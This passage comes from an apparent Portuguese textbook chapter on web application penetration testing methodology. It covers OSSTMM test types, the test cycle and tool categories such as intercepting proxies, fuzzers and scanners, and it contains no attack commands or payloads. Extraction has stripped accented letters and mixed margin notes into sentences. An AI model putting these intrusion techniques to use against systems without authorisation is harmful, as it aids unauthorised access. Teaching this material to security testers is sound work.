riscos identificados. Alguns dos tipos de teste descritos no The Open Source Security Testing
OSSTMM Methodology Manual OSSTMM 3 (Herzog, 2010) visam, justamente, verificar os dois pri-
Metodologia aberta meiros itens da lista acima, em vez da segurana do prprio alvo.
q
para realizao de
testes de segurana Testes de penetrao podem ser classificados em alguns tipos, de acordo com a quanti-
em ambientes,
dade de informao que apresentada ao auditor de segurana:
visando eliminar
aspectos subjetivos da 1 Teste caixa-preta: visa simular as mesmas condies de um atacante real, que
atividade, por meio da
possui acesso somente s informaes pblicas do alvo, como endereos IP externos,
definio de processos
reprodutveis e nomes de domnio e ramo de negcio da entidade.
mtricas para avaliao
dos resultados.
37
1 Teste caixa-branca: neste tipo de teste, todas as informaes do alvo so fornecidas q
ao auditor, incluindo topologia de rede, plataformas utilizadas, diagramas de casos
de uso, linguagens empregadas, cdigos-fonte e endereamento interno. O objetivo
desta abordagem simular ataques que podem ser realizados por pessoas com
conhecimento privilegiado do alvo, como funcionrios e ex-colaboradores.
1 Teste caixa-cinza: este tipo de teste uma mistura dos dois anteriores, antecipando
ao auditor aquelas informaes do alvo que um atacante obteria, cedo ou tarde, em
um processo de invaso real. Desse modo, o objetivo desta modalidade acelerar a
execuo do teste, poupando o tempo gasto pelo auditor nos processos de reconhe-
cimento e mapeamento.
A metodologia OSSTMM (Herzog, 2010) tambm considera na classificao do teste se a

equipe de segurana do ambiente alvo est consciente ou no da realizao do trabalho
pelo auditor de segurana. Com a adio desta varivel, possvel enumerar mais trs tipos
de testes, cujos focos passam a ser, total ou parcialmente, a capacidade de monitoramento e
de resposta da entidade alvo:
1 Teste duplo-cego: um teste caixa-preta, no qual a equipe de segurana do q

ambiente alvo no avisada sobre a execuo do trabalho.
1 Teste duplo-cinza: um teste caixa-cinza em que a equipe de segurana do

ambiente alvo sabe o perodo e o escopo dos testes, mas no os vetores ou canais
que sero empregados pelo auditor.
1 Teste reverso: um teste em que o auditor recebe todas as informaes disponveis

sobre o alvo e no qual a equipe de segurana do ambiente alvo no notificada sobre
a realizao dos testes.
Um problema de se executar os testes sem cincia da equipe de segurana que o processo

tende a ser mais demorado, porque necessrio evadir eventuais mecanismos instalados
para deteco e bloqueio de ataques. Isso implica realizar todas as atividades de enumerao
e invaso mais lentamente, de modo a reduzir ou evitar o disparo de alertas de monitora-
mento de segurana. Alm disso, muitas vezes, diversos endereos de origem devem ser
empregados, o que pode dificultar muito o trabalho, pela indisponibilidade de tais recursos.
Testes de penetrao so uma ferramenta importante no desenvolvimento e manuteno q

de software seguro (McGraw, 2006), evitando que vulnerabilidades sejam inseridas em
ambiente produtivo e avaliando a susceptibilidade dos sistemas a novos tipos de ataques.
Alguns padres de segurana, como o PCI DSS (PCI, 2009a) e o PCI PA-DSS (PCI, 2009b), por
exemplo, requerem testes de invaso regulares contra as aplicaes, visando o atendimento
desses objetivos. No contexto apresentado, o objetivo deste captulo introduzir uma meto-
dologia de teste de invaso de aplicaes web, abordando as fases de reconhecimento, mape-
amento e algumas tcnicas de descoberta de vulnerabilidades. Desse modo, o restante deste

captulo inclui, alm da discusso de metodologia, ferramentas bsicas, como proxies de intercep-
tao e varredores de portas, e tcnicas de explorao de controles no lado cliente da aplicao.
Teste de invaso
O que se entende por teste de invaso?
38
Metodologia de teste de invaso
fundamental realizar testes de invaso, assim como qualquer outra atividade, de q
acordo com mtodos pr-definidos, de modo a permitir que diferentes pessoas
alcancem resultados semelhantes, que possam ser reproduzidos.
Conforme j mencionado, um teste de invaso um processo cclico que envolve a execuo

de diversas atividades, como as ilustradas na Figura 2.1. Antes de prosseguir com o detalha-
mento de cada uma delas, porm, vale justificar, por meio de uma analogia, a necessidade
da repetio de algumas das tarefas que compem um teste de invaso.
Imagine-se uma pessoa que queira escalar uma montanha e apreciar a vista privilegiada do
topo. Inicialmente, ela deve reconhecer e mapear pontos intermedirios que possam ser
alcanados, limitando-se ao que possvel enxergar a partir da base. Em seguida, ela deve
identificar caminhos que a conduzam aos lugares mapeados e percorr-los para atingi-los.
Nesta nova posio, tem-se uma vista maior do horizonte e a pessoa capaz de vislumbrar
novas regies para as quais se dirigir, repetindo as etapas anteriores. Note-se que, a cada
iterao, ela se aproxima mais e mais do cume e consegue ver muito mais do que circunda a
montanha. Haver vezes, porm, que a partir de certos lugares, no ser possvel progredir
e ela ter de retornar um ou mais passos, para continuar. Tudo isso ocorre de maneira
similar em um pentest!
Denio de escopo
e autorizao
Documentao
Reconhecimento
Explorao de
Mapeamento
vulnerabilidades
Identicao de
vulnerabilidades
Figura 2.1
Etapas de um teste Apresentao de resultados
de invaso.
O primeiro passo, antes de iniciar qualquer teste de invaso, obter do cliente, por escrito, q
uma autorizao para execuo do teste e o escopo que ser coberto pela atividade.
Normalmente, isso feito por meio de um contrato assinado entre as partes, que define,
tambm, o tipo de teste que ser realizado, as premissas do trabalho (por exemplo, janelas
tcnicas que sero disponibilizadas) e os insumos que devem ser fornecidos pelo contratante,
nos casos de testes caixa-cinza ou caixa-branca. Para estes ltimos, comum solicitar, alm
da documentao da aplicao, a criao de usurios com perfis comuns e a enumerao de
um ou mais usurios privilegiados, para os testes de escalada de privilgios. Cabe ao cliente,
por sua vez, definir se a equipe de segurana interna ser avisada ou no sobre o pentest.
Outro ponto que deve ser considerado se os testes sero realizados internamente, q
externamente ou a partir de ambos os posicionamentos.
39
No primeiro caso, a estao de teste deve ser colocada no mesmo segmento da rede em que
ficam os usurios comuns da entidade, com o mesmo nvel de acesso lgico e fsico. J no
teste externo, o auditor recebe um acesso equivalente ao de um usurio remoto ou ao de
um possvel atacante, ou seja, todos os testes sero controlados por quaisquer mecanismos
de proteo de permetro, como firewalls e WAFs. Eventualmente, as regras desses ele- WAF
mentos podem ser suavizadas para os endereos IP de origem, de modo a no bloque-los Web Application Firewall
um dispositivo
e impedir o andamento dos testes. Um exemplo de caso em que necessrio realizar testes
que atua na camada
internos e externos o atendimento do requisito 11 do PCI DSS (PCI, 2009a). de aplicao com o
O trabalho propriamente dito comea com a fase de reconhecimento, cujo objetivo q objetivo de identificar
e bloquear trfego
levantar qualquer tipo de informao que possa auxiliar no teste de invaso. malicioso direcionado
a uma aplicao web.
Assim, nesta etapa, o auditor busca identificar, por exemplo, servidores que suportam a Por meio da definio
de regras, capaz
aplicao, sistemas operacionais instalados, linguagens de programao empregadas, nomes
de oferecer proteo
de potenciais usurios do sistema, regras de formao de identificadores de usurio, configu- contra ataques
raes de softwares, conveno utilizada na atribuio de nomes de mquinas, dentre muitas conhecidos, como
Injeo de SQL e XSS,
outras informaes. Todo esse levantamento realizado de diversas maneiras, incluindo
por exemplo, alm de
testes no prprio ambiente, testes indiretos e pesquisa em fontes de informao externas. servir para aplicao de
O prximo passo, o de mapeamento, consiste em relacionar tudo que foi coletado na etapa q correes virtuais, para
vulnerabilidades recm-
anterior e criar um mapa da aplicao, que reflita a estruturao dos arquivos componentes, descobertas e no
previstas pelo sistema.
as funcionalidades ofertadas, os pontos de entrada de informao e as tecnologias utilizadas.
Para isso, as informaes j coletadas devem ser complementadas com as pginas que
compem o sistema, que podem ser obtidas por mtodos manuais ou automticos. Em
caso de teste caixa-preta, na primeira iterao, comum que apenas algumas sees da
aplicao sejam mapeadas, pois ainda no se tem acesso s reas protegidas, que requerem
autenticao do usurio. Tais regies s podem ser alcanadas medida que o teste avana,
vulnerabilidades identificadas so exploradas e acesso obtido.
A partir do mapa construdo, deve-se proceder descoberta de vulnerabilidades, q

nas diversas camadas que compem a aplicao.
Por exemplo, imagine-se que uma aplicao de correio eletrnico est sendo testada e as
nicas pginas mapeadas, inicialmente, so a de autenticao de usurio e a de recupe-
rao de senha. Alm disso, considere-se que na fase de reconhecimento, descobriu-se um
diretrio conf acessvel via servidor web. No cenrio exposto, a presena das seguintes
fraquezas, pelo menos, deve ser verificada:
1 Existncia de arquivos interessantes no diretrio conf que possam conter, por exemplo,
identificadores de usurios vlidos;
1 Entropia baixa dos identificadores de sesso gerados pela aplicao;

1 Possibilidade de enumerao de usurios na tela de autenticao;
1 Perguntas fceis de serem respondidas na pgina de recuperao de senha;

1 Pginas de autenticao de usurio e de recuperao de senhas vulnerveis injeo de SQL;
1 Aceitao pela aplicao de identificadores de sesso fixados pelo usurio;
1 Presena de parmetros na requisio, que possam ser adulterados pelo auditor;
1 Pginas diretamente acessveis, sem a necessidade de autenticao.
O guia de testes do OWASP (Meucci et al., 2008), que base do presente texto, enumera veri-
ficaes para cerca de setenta vulnerabilidades, agrupadas nas seguintes classes, as quais
sero cobertas ao longo deste curso:
40
1 Levantamento de informaes culminam na revelao de informaes relevantes a
um atacante. Exemplo: exibio de comando SQL ao usurio, devido a erro causado por
sintaxe incorreta.
1 Gerenciamento de configurao parmetros definidos de maneira insegura em

qualquer das plataformas que compem a aplicao permitem subverter mecanismos de
segurana ou obter acesso direto infraestrutura subjacente. Exemplo: servidor SSL/TLS
que aceita cifras nulas na proteo do canal.
1 Autenticao fraquezas que permitem que um atacante seja reconhecido como um

usurio legtimo do sistema, sem conhecimento prvio da senha. Exemplo: tela de auten-
ticao vulnervel injeo de SQL.
1 Gerenciamento de sesses tem origem no tratamento inseguro dos identificadores
l
de sesso em algum ponto do ciclo de vida deles, resultando em acesso no autorizado
a funcionalidades e informaes. Exemplo: uso de nmeros sequenciais para identifica-
Web service um
componente de dores de sesso.
software descrito em
WSDL que fornece um 1 Autorizao vulnerabilidades que possibilitam que algum sem os devidos privilgios
servio acessvel pela realize uma operao ou acesse uma informao. Exemplo: sistema que desabilita itens
rede a outros servios de menu de acordo com verificao inicial de privilgios, mas que no valida as requisi-
e aplicaes.
Asynchronous es, quando realizadas.
JavaScript and XML
1 Lgica de negcios erros na implementao das regras de negcio fornecem um
(AJAX) compreende um
conjunto de tecnolo- caminho para que elas no sejam honradas por usurios maliciosos. Exemplo: loja de
gias utilizadas com o comrcio eletrnico que no verifica se o preo de um produto negativo.
objetivo de permitir a
criao de aplicaes 1 Validao de dados esta classe engloba os problemas decorrentes do uso de infor-
interativas, que maes fornecidas por usurios, sem as validaes necessrias, e pode acarretar desde
buscam informaes
o vazamento de informaes at o comprometimento de outros usurios do ambiente.
no servidor de
maneira assncrona, Exemplo: informao usada diretamente na construo de uma consulta SQL, permi-
por meio de Javascript. tindo a injeo de comandos arbitrrios.
Estas podem ser
formatadas como 1 Negao de servio falhas que podem ser usadas para impedir o uso da aplicao,
documentos XML ou normalmente, pela exausto de recursos. Exemplo: sistema que no verifica memria
HTML, por exemplo, e
utilizadas para disponvel antes de realizar alocao dinmica.
atualizar dinamica-
1 Web services e AJAX de modo geral, so afetados por variaes das vulnerabilidades
mente a pgina com a
qual o usurio est tradicionais, com algumas peculiaridades de cada tecnologia. Exemplo: web service que
interagindo. no valida se a mensagem bem formada, antes de process-la.
A ltima fase do ciclo compreende a explorao, quando possvel, das vulnerabilidades q

encontradas, de modo a violar requisitos implcitos ou explcitos de segurana da aplicao.
importante notar que o processo no deve parar quando um ataque for bem-sucedido, pois,
o objetivo do teste de invaso encontrar o mximo de caminhos possveis que possam levar
a um comprometimento da aplicao, dos usurios ou do ambiente. Assim, tomando-se como
Sequestro de sesso base o ltimo exemplo, mesmo que o analista execute com sucesso um sequestro de sesso,
Ataque que permite devido baixa entropia dos identificadores de sesso, ainda dever testar outros ataques,
tomar o controle
como evaso da pgina de autenticao e acesso direto a recursos do sistema.
q
de uma sesso
estabelecida entre o
Claramente, aps executada a etapa de explorao, fundamental que o auditor de
usurio e um sistema.
segurana tenha obtido um maior nvel de acesso ao sistema ou uma melhor compre-
enso dele, que permita abord-lo por outro ngulo.
41
De outro modo, no faz sentido iniciar uma nova rodada do ciclo, uma vez que nenhum
avano foi conseguido com a ltima iterao. Caso isso acontea, a melhor estratgia
revisar tudo que foi encontrado at o momento, para detectar possveis pontos que dei-
xaram de ser explorados, antes de dar o teste por encerrado.
Embora a identificao de vulnerabilidades e a explorao possam ser realizadas conjun-

tamente, e assim que esses tpicos sero abordados neste curso, recomenda-se, nos
primeiros testes, execut-los separadamente. A razo disso evitar o excitamento natural
que acomete uma pessoa frente a novas descobertas, que pode fazer com que o auditor
foque somente o objetivo que considera o ideal e desconsidere diversos outros problemas
existentes na aplicao.
Paralelamente a todas as atividades descritas, est o processo de documentao, que se q

inicia com o contrato formal e permeia as quatro etapas do ciclo de teste de invaso.
Tudo que for encontrado deve constar no relatrio que ser entregue como resultado do
trabalho, incluindo aquelas vulnerabilidades que no puderam ser exploradas. Os ataques
realizados devem ser descritos de modo a permitir a reproduo pelo cliente, se desejado,
e, assim, devem conter o mximo de detalhes, como pr-condies, ferramentas utilizadas e
mtodos empregados. Normalmente, inclui-se tambm uma recomendao geral indicando
como o problema pode ser solucionado.
Por fim, e no menos importante, encontra-se a apresentao de resultados, que deve q

ser ajustada de acordo com as caractersticas da audincia.
Por exemplo, aceitvel incluir detalhes tcnicos de cada explorao para o corpo tcnico
da empresa, mas no para membros da diretoria. Neste caso, normalmente, melhor
focar nos impactos decorrentes dos ataques possveis, do que nos mtodos que devem
ser empregados para aproveitar-se das vulnerabilidades presentes no ambiente. Com-
plementarmente, uma anlise de risco quantitativa relacionada aos vetores de ataque
muito bem-vinda.
Etapas de um teste de invaso
Quais so as etapas de um teste de invaso?
Ferramentas bsicas
Para realizar qualquer teste de invaso, um conjunto mnimo de ferramentas deve q
estar disponvel, independentemente de serem livres ou pagas. O ideal que o auditor

prepare um notebook, com bom processador e bastante memria, instalando uma ou
mais ferramentas de cada classe, com as quais se sinta vontade para trabalhar.
De modo geral, possvel encontrar timas solues livres, que cobrem a maior parte das
necessidades de um trabalho dessa natureza. Uma exceo a esta regra, talvez, sejam os
varredores automticos de vulnerabilidades, cujos exemplares livres ainda esto aqum dos
melhores produtos comerciais. Antes de sair comprando ferramentas carssimas, porm,
considere-se que elas so capazes de encontrar apenas os problemas mais simples, que
podem ser descritos em regras gerais, e que os itens de maior interesse ainda requerem o
conhecimento e experincia do analista.
42
No restante desta seo, ferramentas pertencentes s seguintes categorias q
sero apresentadas:
1 Navegadores web.
1 Proxies de interceptao.
1 Web spiders.
1 Fuzzers.
1 Varredores de portas e servios.
1 Varredores de vulnerabilidades.
1 Outras ferramentas.
Navegadores web
Os navegadores web so uma pea fundamental de um teste de invaso de aplicaes q
web, uma vez que so utilizados pelos usurios para os acessos normais aos sistemas.
Cada representante deles apresenta particularidades no uso do protocolo HTTP e na
maneira como documentos HTML so manipulados, ainda mais quando so utilizados
elementos no padronizados. Isso faz com que alguns tipos de ataques no funcionem
em todos os tipos de navegadores, e, portanto, uma boa prtica realizar os testes con-
siderando mais de um fornecedor e verses diferentes do mesmo software.
Como atacantes, muitas vezes, querem afetar de uma s vez o maior nmero de aplicaes
e usurios, razovel esperar que os ataques sejam direcionados s plataformas mais
populares. Assim, interessante saber a fatia de mercado de cada navegador, para que os
testes sejam direcionados para os mais utilizados apenas.
H diversos estudos na internet sobre esse assunto (NetMarketShare, StatCounter, StatOwl), q

mas no h um consenso entre eles para os representantes com as menores porcentagens.
Aplicando-se mdia aritmtica simples aos resultados, tem-se a seguinte classificao:
1 Microsoft Internet Explorer 56,36%

1 Mozilla Firefox 24,87%
1 Google Chrome 9,86%
1 Apple Safari 6,39%
1 Opera 1,52%
Vejamos a seguir as principais caractersticas dos navegadores mais populares:
1 Microsoft Internet Explorer o navegador fornecido pela Microsoft juntamente com

Controle ActiveX os sistemas operacionais Windows. Suporta controles ActiveX nativamente, uma vez
Pequeno programa que
que esta uma tecnologia da mesma empresa. Dada a sua popularidade, praticamente,
pode ser executado em
navegadores web, com todo stio e aplicao web construdo para suport-lo e, assim, importante que seja
o propsito de estender utilizado em um teste de invaso, sobretudo quando ActiveX for empregado. Novas
as funcionalidades
funcionalidades podem ser adicionadas por meio de extenses, como HttpWatch e
existentes.
TamperIE, que podem ser utilizadas para testar a segurana de aplicaes web.
1 Mozilla Firefox um rpido navegador, livre e multi-plataforma, mantido pela fun-

dao Mozilla, ao lado de diversos outros projetos. Trabalha muito bem com a maioria
dos stios web, mas no possui suporte nativo para controles ActiveX. Apresenta diversas
funcionalidades de segurana, como bloqueio de pginas conhecidas por contedo
malicioso, navegao privativa e integrao com software antivrus. Permite adicionar
inmeras novas funcionalidades por meio de complementos, alguns dos quais podem
43
ser utilizados em testes de invaso. Exemplos interessantes incluem Multiproxy Switch,
FoxyProxy, TamperData, HttpWatch e Add N Edit Cookies.
1 Google Chrome fornecido pelo Google, um navegador extremamente rpido e

simples, que pode ser executado em plataformas Windows e Linux. Tem crescido muito
em popularidade, apesar de ainda no conseguir operar com qualquer tipo de stio web.
Por exemplo, aplicaes web bancrias empregam comumente mdulos de segurana
que no so desenvolvidos para Chrome. Dentre os aspectos de segurana implemen-
tados, esto o aviso e bloqueio no caso de acesso a contedo malicioso, e a necessidade
de autenticao para instalao de complementos, prevenindo que malwares infectem Malware
o navegador. Por fim, igualmente ao Firefox e ao Internet Explorer, permite adicionar Abreviao de malicious
software, que se refere
funcionalidades por meio de extenses.
a qualquer programa
de computador que
Proxies de interceptao tem por objetivo
Os proxies de interceptao so uma das ferramentas mais utilizadas em testes de q violar a segurana
de um ambiente,
invaso de aplicaes web, permitindo inspecionar requisies e respostas HTTP e sem consentimento
do usurio. Vrus de
alter-las conforme desejado, em tempo real. Eles so executados localmente, na
computador, worms,
prpria estao em que roda o navegador web, e interceptam todo trfego dele baseado cavalos de troia e
em HTTP/HTTPS, dissecando o contedo de cada pacote. spywares so exemplos
de malwares.
Para isso, o navegador deve ser configurado para direcionar o trfego para o proxy em uso,
o que depende da verso de software utilizada. O esquema geral de funcionamento deste
tipo de ferramenta e as interaes que ocorrem entre os diversos elementos esto ilus-
trados na Figura 2.2.
Estao local
Requisio Requisio
Navegador Proxy de Servidor
Figura 2.2
web interceptao web
Resposta Resposta Funcionamento
de um proxy de
interceptao.
No caso do protocolo HTTPS, um proxy transparente atua como um encaminhador de

pacotes TCP para o servidor destino, com o qual o navegador web estabelece o tnel SSL/TLS
fim-a-fim. Se um proxy de interceptao funcionasse da mesma maneira, no seria possvel
inspecionar o contedo da conversao, que o objetivo principal a ser alcanado por ele.
Assim, o processo precisa ser alterado para que este requisito funcional seja atendido corre-
tamente (Stuttard e Pinto, 2007).
O primeiro passo o envio pelo navegador de uma requisio CONNECT ao proxy, que
respondida com uma mensagem com cdigo de estado 200. A partir desse momento, o
proxy simula o lado servidor do tnel SSL/TLS para o navegador e inicia, como um cliente,
uma segunda conexo SSL/TLS para o servidor destino original. Como as chaves criptogr-
ficas utilizadas pelo proxy no so as verdadeiras, uma mensagem de erro exibida pelo
navegador, que deve ser ignorada (vide Figura 2.3). Durante o restante da conexo, o proxy
atua como um tradutor, recebendo os dados enviados pelo navegador, armazenando-os
para inspeo e enviando-os ao servidor destino, por meio da segunda conexo. Este fluxo
pode ser observado na Figura 2.4.
44
Figura 2.3
Erro do navegador
devido a acesso
HTTPS por meio
do proxy.
Estao
Navegador Proxy Servidor web
Dados Dados Dados Dados
HTTP HTTP HTTP
SSL / TLS SSL / TLS SSL / TLS
TCP TCP TCP
IP IP IP
Enlace/Fsico Enlace/Fsico Enlace/Fsico

Figura 2.4
Funcionamento
de proxy de
interceptao para Internet
conexes HTTPS.
Alm da funcionalidade bsica de interceptao, estas ferramentas fornecem diversas q

outras possibilidades, como a definio de filtros para seleo de mensagens, manu-
teno de histrico detalhado de requisies realizadas e respectivas respostas, substi-
tuio automtica de valores nas mensagens por meio de regras definidas pelo usurio,
manipulao das interceptaes diretamente no navegador e revelao de campos
escondidos, para visualizao direta no navegador (Stuttard e Pinto, 2007).
45
Os exemplares mais sofisticados dos proxies de interceptao fazem parte de sutes q
integradas de teste de aplicaes, dentre as quais pode-se citar:
1 WebScarab um arcabouo livre de ferramentas para teste de aplicaes web,

que mantido como um projeto OWASP. Como escrito na linguagem Java, pode ser
utilizado em diversos sistemas operacionais, bastando para isso haver uma mquina
virtual Java disponvel. As funcionalidades so disponibilizadas por meio de diversos
plugins, que podem ser alterados, removidos ou adicionados pelo usurio.
1 Paros um software livre, desenvolvido em Java pela Chinotec Technologies, que

prov funcionalidades de proxy de interceptao, spider e varredor de vulnerabili-
dades. Esta ltima, embora muito aqum do fornecido por softwares especializados
e pagos, permite encontrar problemas simples em aplicaes web como cross-site
scripting e injeo de SQL.
1 Burp Suite uma plataforma integrada de testes, desenvolvida em Java pela empresa
PortSwigger Port Security, que pode ser empregada em todas as etapas de um teste
de invaso. H uma verso gratuita, que possui somente os mdulos bsicos, e outra
paga, que conta com muito mais recursos, como o Burp Scanner e o Burp Intruder, utili-
zados para varredura de vulnerabilidades e intruso de aplicaes, respectivamente.
Existem alternativas mais simples a estas sutes que podem ser instaladas diretamente nos
navegadores, na forma de extenses. Elas manipulam os dados antes de serem encapsu-
lados para transporte pela rede e, assim, permitem operar com o protocolo HTTPS, sem a
necessidade de estabelecer uma conexo com um proxy de interceptao. De maneira geral,
permitem alterar apenas os dados de requisies, mas isso mais que suficiente para testar
uma grande variedade de vulnerabilidades. O TamperIE e o TamperData so dois exemplos,
j citados neste curso, desse tipo de utilitrio.
Web spiders
Estas ferramentas, tambm chamadas de web crawlers, so empregadas na fase de q
mapeamento e tm por objetivo montar automaticamente o mapa da aplicao, visi-
tando cada pgina disponvel e realizando uma cpia local de cada recurso encontrado,
para fins de anlise posterior. Esse processo realizado facilmente para stios web com
contedo esttico, por meio de uma busca recursiva de recursos, com base nos links
existentes, limitados ao domnio de interesse.
Quando executadas para mapear aplicaes web, porm, devido natureza dinmica
destas, diversas dificuldades surgem, que nem sempre podem ser resolvidas satisfato-
riamente. O problema fundamental que a ferramenta precisa entender a semntica da
pgina analisada, em vez de simplesmente procurar por referncias a outros recursos.
Assim, ela deve ser capaz de: trabalhar com navegao baseada em formulrios, parme-
tros ou menus gerados dinamicamente por cdigo Javascript; lidar com processos de auten-
ticao e funcionalidades que demandam mltiplos passos para execuo; determinar o
tipo de dado aceito em campos de entrada, para fornecer valores adequados; e, interpretar
mensagens de erro que eventualmente sejam exibidas.
Mesmo que os requisitos acima possam ser satisfeitos, muito arriscado executar um
mapeamento totalmente automatizado e, assim, um mtodo hbrido deve ser utilizado, con-
forme ser visto posteriormente. Uma das razes para isso que, ao tentar mapear todas as
funcionalidades, uma ferramenta assim pode executar aes indesejadas e perigosas, como
remover um usurio, alterar as configuraes do sistema ou transferir fundos de uma conta
46
para outra. Alm das sutes de teste integradas j apresentadas, que tambm incluem web
spiders, o utilitrio wget e a ferramenta webshag so outros exemplos que podem ser dados.
Fuzzers
Para identificar falhas no tratamento e validao de informaes, devem ser utilizados q
dados invlidos, que estejam fora dos domnios esperados pela aplicao. Por exemplo,
para um campo que aceita o dia do ms, nmeros negativos ou maiores que 31 devem
ser empregados. Em alguns casos, como no teste de cross-site scripting, um campo pode
aceitar qualquer tipo de texto, mas os dados para teste devem respeitar uma sintaxe
especfica, para que o ataque funcione.
Cabe ao analista de segurana descrever o domnio de valores a ser testado em cada item
de entrada, mas, normalmente, listas pr-definidas esto disponveis para os casos mais
comuns. Para evadir ou quebrar eventuais filtros que tenham sido implementados, diversas
representaes de um mesmo dado devem ser submetidas pela ferramenta. Isso vlido
tambm para ataques que visam explorar navegadores especficos ou a interao entre a
aplicao e as plataformas subjacentes.
Existem alguns fuzzers disponveis para uso, dentre os quais possvel citar o Spike, a plata-
forma Peach Fuzzing, o WebFuzzer e o mdulo do WebScarab criado com esse propsito.
Varredores de portas e servios

Um varredor de portas e servios um software que analisa uma ou mais mquinas e q
identifica as portas abertas e os servios especficos que esto sendo executados em
cada uma delas. Opcionalmente, pode tambm detectar o tipo e a verso do sistema
operacional utilizado.
Analistas de segurana empregam este tipo de ferramenta para verificar se os ativos pelos
quais zelam esto executando apenas os servios autorizados, e para levantar informaes
preliminares do ambiente em testes de invaso caixa-preta e varreduras de vulnerabilidades.
O princpio de funcionamento de um varredor de portas se baseia na suposio que o q

ativo implementa corretamente a camada de transporte da pilha de rede, de acordo com
a RFC 793 (Postel, 1981). Se essa premissa no atendida, e isso ocorre algumas vezes,
o processo pode gerar falsos positivos ou negativos. Tendo isso em mente, os principais
mtodos de deteco so:
1 Varredura TCP a ferramenta tenta estabelecer uma conexo TCP e, somente no

caso da negociao ser executada com sucesso, a porta considerada aberta.
1 Varredura SYN neste mtodo, um pacote SYN enviado ao ativo, o qual deve res-
ponder com um pacote SYN-ACK, caso a porta esteja aberta. Se isso acontecer,
a ferramenta envia um RST, para que a conexo TCP no seja estabelecida.
1 Varredura UDP um pacote UDP enviado para uma porta do ativo, o qual deve
gerar uma mensagem ICMP Port Unreachable, caso esteja fechada. Se nenhuma men-
sagem de erro for recebida pelo aplicativo, a porta considerada aberta.
1 Varredura FIN um pacote com o flag FIN ligado enviado a uma porta e, caso
ela esteja fechada, um pacote RST deve ser devolvido pelo ativo. De outro modo, o
pacote deve ser ignorado e nenhuma resposta gerada.
Uma vez detectadas as portas abertas, a identificao dos respectivos servios pode ser
realizada por meio de duas tcnicas principais: Verificao nula e Portas TCP e UDP.
47
A primeira, aplicvel ao protocolo TCP, consiste em se conectar na porta e esperar alguns
segundos, pela possibilidade de apresentao do banner de boas-vindas. Se isto ocorrer, ele
comparado contra uma base que tem o mapeamento para verses especficas de servios.
Note-se que isto pode gerar falsos positivos, caso o ativo seja configurado para exibir um
banner de outro fornecedor. O segundo mtodo, mais confivel e aplicvel a portas TCP e
UDP, resume-se em interagir com o servio e realizar a identificao, de acordo com o compor-
tamento apresentado e com uma base de respostas caractersticas de servios conhecidos.
A ferramenta mais popular deste tipo o Nmap, criado por Gordon Fyodor Lyon e distri-
budo como software livre para plataformas Windows, Linux e Mac OS X. Pode ser usado
para levantar rapidamente as informaes de uma nica mquina ou de redes inteiras,
empregando os mais diversos mtodos conhecidos. A interface padro por linha de
comando, mas h interfaces grficas disponveis, como Zenmap e NmapSI.
Varredores de vulnerabilidades
Estas ferramentas tm por objetivo encontrar, de maneira automatizada, o maior q
nmero possvel de vulnerabilidades em um ativo. O mecanismo bsico de funciona-
mento consiste no envio de requisies e anlise das respostas obtidas, em busca de
evidncias de que uma dada vulnerabilidade est presente.
Por exemplo, o varredor pode tentar acessar arquivos de exemplo instalados por padro
em uma dada plataforma e, se a solicitao for bem-sucedida, possvel concluir que h
um problema a ser resolvido. Essa estratgia tima para verificar fraquezas em softwares
de prateleira e os embutidos em hardware, uma vez que as instalaes no variam muito
de uma mquina para outra e, assim, possvel construir uma base de dados de vulnera-
bilidades que podem afet-los. Aplicaes web, por outro lado, tendem a ser nicas, j que
normalmente so construdas para propsitos especficos e, logo, devem ser tratadas como
tais, inviabilizando a criao de um dicionrio especfico de fraquezas.
As dificuldades encontradas em web spiders, que foram discutidas anteriormente, q

tambm afetam os varredores de vulnerabilidades, mas em um grau maior, pois a tarefa
a ser executada depende da qualidade do mapeamento. Em decorrncia deste fato e do
estado-da-arte desse tipo de tecnologia, apenas algumas classes de vulnerabilidades de
aplicaes web podem ser detectadas de maneira confivel e, para qualquer classe, no
se deve esperar que todas as ocorrncias, em uma dada aplicao, sejam descobertas.
Sempre existiro casos mais sutis que dependero do conhecimento do analista de segurana
para serem identificados. Logo, importante ter em mente que as ferramentas ainda no so
capazes de substituir os seres humanos, mas sim de auxili-los em termos de produtividade.
De acordo com Stuttard e Pinto (2007), as vulnerabilidades que podem ser encontradas q
automaticamente so aquelas para as quais possvel descrever claramente a assina-
tura de ataque e o resultado que deve ser verificado para inferir a presena da fraqueza,
como por exemplo:
1 Cross-site scripting refletido.

1 Alguns tipos de injeo de SQL.
1 Alguns tipos de injeo de comando.
1 Navegao e listagem de diretrios.
48
importante conhecer tambm os tipos de vulnerabilidades que normalmente no so detec- q
tados corretamente. A lista abaixo, adaptada de Stuttard e Pinto (2007), no visa ser exaustiva:
1 Falhas no controle de acesso.

1 Problemas que, para serem explorados, precisam que parmetros sejam alterados
considerando a semntica associada.
1 Uso inadequado de criptografia.

1 Falhas de lgica decorrentes de situaes no previstas, como a remoo de um
parmetro obrigatrio.
Um estudo realizado por Doup, Cova e Vigna (2010) avaliou onze varredores de vulnerabili-
dades, livres e pagos, contra a aplicao WackoPicko, que desenvolveram especificamente
para os testes, contendo dezesseis vulnerabilidades de diversas classes. O trabalho
analisou, para cada ferramenta, capacidade de deteco, quantidade de falsos positivos
reportados, qualidade do mapeamento, tempo de execuo, nmero de acessos realizados,
interpretao de Javascript e criao automtica de contas de usurio. Alguns dos resul-
tados podem ser observados na Figura 2.5, que aproveita para dar exemplos dos principais
varredores existentes atualmente.
Falsos Tempo de
Ferramenta Licena Escore
positivos execuo (s)
Acunetix Comercial 14 1 < 1000
AppScan Comercial 10 11 < 2000
Burp Comercial 13 1 < 1000
Grendel-Scan GPLv3 3 15 < 1000
Hailstorm Comercial 6 3 < 1000
Milescan Comercial 4 0 < 1000
N-Stalker Comercial 13 5 > 25000
NTOSpider Comercial 4 3 < 2000
Figura 2.5 Paros CAL 6 1 < 2000

Alguns resultados
do estudo w3af GPLv2 9 1 < 2000
de Doup, Cova e
Vigna (2010). Webinspect Comercial 13 215 < 2000
Outras ferramentas
Outras ferramentas podem ser teis em situaes especficas: q
1 Netcat
1 OpenSSL
1 Nikto
1 Metasploit Framework
H inmeras outras ferramentas disponveis, alm das apresentadas at aqui, que podem
ser teis em situaes especficas e que devem ser consideradas como parte de um cinto de
utilidades de uma pessoa que realiza testes de invaso em aplicaes web. Adicionalmente,
49
em alguns casos, pode ser necessrio personalizar uma ferramenta j existente ou criar
uma prpria e, assim, interessante dominar uma ou mais linguagens de programao.
Netcat
Utilitrio de rede distribudo sob licena GPL e considerado por muitos como o canivete suo
de redes TCP/IP, devido a sua grande versatilidade. Permite enviar e receber dados, utilizando
